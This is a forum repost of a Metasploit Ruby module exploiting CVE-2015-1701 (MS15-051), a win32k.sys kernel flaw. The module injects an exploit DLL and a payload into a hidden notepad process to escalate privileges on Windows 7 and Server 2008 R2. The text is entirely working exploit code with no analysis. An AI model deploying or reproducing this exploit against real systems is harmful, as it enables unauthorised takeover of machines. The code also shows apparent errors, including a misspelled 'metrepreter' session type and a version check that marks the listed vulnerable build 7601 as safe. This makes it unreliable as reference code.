Windows ClientCopyImage Win32k Exploit

admin

1. ##
   
2. # This module requires Metasploit: [url]http://metasploit.com/download[/url]
   
3. # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
   
4. ##
   
5.   
   
6. require 'msf/core'
   
7. require 'msf/core/post/windows/reflective_dll_injection'
   
8. require 'rex'
   
9.   
   
10. class Metasploit3 < Msf::Exploit::Local
    
11.   Rank = NormalRanking
    
12.   
    
13.   include Msf::Post::File
    
14.   include Msf::Post::Windows::Priv
    
15.   include Msf::Post::Windows::Process
    
16.   include Msf::Post::Windows::FileInfo
    
17.   include Msf::Post::Windows::ReflectiveDLLInjection
    
18.   
    
19.   def initialize(info={})
    
20.     super(update_info(info, {
    
21.       'Name'            => 'Windows ClientCopyImage Win32k Exploit',
    
22.       'Description'     => %q{
    
23.         This module exploits improper object handling in the win32k.sys kernel mode driver.
    
24.         This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
    
25.         Windows 2008 R2 SP1 x64.
    
26.       },
    
27.       'License'         => MSF_LICENSE,
    
28.       'Author'          => [
    
29.           'Unknown',    # vulnerability discovery and exploit in the wild
    
30.           'hfirefox',   # Code released on github
    
31.           'OJ Reeves'   # msf module
    
32.         ],
    
33.       'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
    
34.       'Platform'        => 'win',
    
35.       'SessionTypes'    => [ 'metrepreter' ],
    
36.       'DefaultOptions'  => {
    
37.           'EXITFUNC'    => 'thread',
    
38.         },
    
39.       'Targets'         => [
    
40.           [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
    
41.           [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
    
42.         ],
    
43.       'Payload'         => {
    
44.           'Space'       => 4096,
    
45.           'DisableNops' => true
    
46.         },
    
47.       'References'      => [
    
48.           ['CVE', '2015-1701'],
    
49.           ['MSB', 'MS15-051'],
    
50.           ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],
    
51.           ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],
    
52.           ['URL', 'https://technet.microsoft.com/library/security/MS15-051']
    
53.         ],
    
54.       'DisclosureDate'  => 'May 12 2015',
    
55.       'DefaultTarget'   => 0
    
56.     }))
    
57.   end
    
58.   
    
59.   def check
    
60.     # Windows Server 2008 Enterprise SP2 (32-bit)  6.0.6002.18005 (Does not work)
    
61.     # Winodws 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
    
62.     # Windows 7 SP1 (32-bit)                       6.1.7601.17514 (Works)
    
63.     # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.17514 (Works)
    
64.   
    
65.     if sysinfo['OS'] !~ /windows/i
    
66.       return Exploit::CheckCode::Unknown
    
67.     end
    
68.   
    
69.     if sysinfo['Architecture'] =~ /(wow|x)64/i
    
70.       arch = ARCH_X86_64
    
71.     elsif sysinfo['Architecture'] =~ /x86/i
    
72.       arch = ARCH_X86
    
73.     end
    
74.   
    
75.     file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
    
76.     major, minor, build, revision, branch = file_version(file_path)
    
77.     vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
    
78.   
    
79.     return Exploit::CheckCode::Safe if build == 7601
    
80.   
    
81.     return Exploit::CheckCode::Detected
    
82.   end
    
83.   
    
84.   def exploit
    
85.     if is_system?
    
86.       fail_with(Failure::None, 'Session is already elevated')
    
87.     end
    
88.   
    
89.     if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
    
90.       fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    
91.     end
    
92.   
    
93.     if sysinfo['Architecture'] =~ /wow64/i
    
94.       fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    
95.     elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
    
96.       fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    
97.     elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
    
98.       fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    
99.     end
    
100.   
     
101.     print_status('Launching notepad to host the exploit...')
     
102.     notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
     
103.     begin
     
104.       process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
     
105.       print_good("Process #{process.pid} launched.")
     
106.     rescue Rex::Post::Metrepreter::RequestError
     
107.       # Reader Sandbox won't allow to create a new process:
     
108.       # stdapi_sys_process_execute: Operation failed: Access is denied.
     
109.       print_status('Operation failed. Trying to elevate the current process...')
     
110.       process = client.sys.process.open
     
111.     end
     
112.   
     
113.     print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
     
114.     if target.arch.first == ARCH_X86
     
115.       dll_file_name = 'cve-2015-1701.x86.dll'
     
116.     else
     
117.       dll_file_name = 'cve-2015-1701.x64.dll'
     
118.     end
     
119.   
     
120.     library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)
     
121.     library_path = ::File.expand_path(library_path)
     
122.   
     
123.     print_status("Injecting exploit into #{process.pid}...")
     
124.     exploit_mem, offset = inject_dll_into_process(process, library_path)
     
125.   
     
126.     print_status("Exploit injected. Injecting payload into #{process.pid}...")
     
127.     payload_mem = inject_into_process(process, payload.encoded)
     
128.   
     
129.     # invoke the exploit, passing in the address of the payload that
     
130.     # we want invoked on successful exploitation.
     
131.     print_status('Payload injected. Executing exploit...')
     
132.     process.thread.create(exploit_mem + offset, payload_mem)
     
133.   
     
134.     print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
     
135.   end
     
136.   
     
137. end

复制代码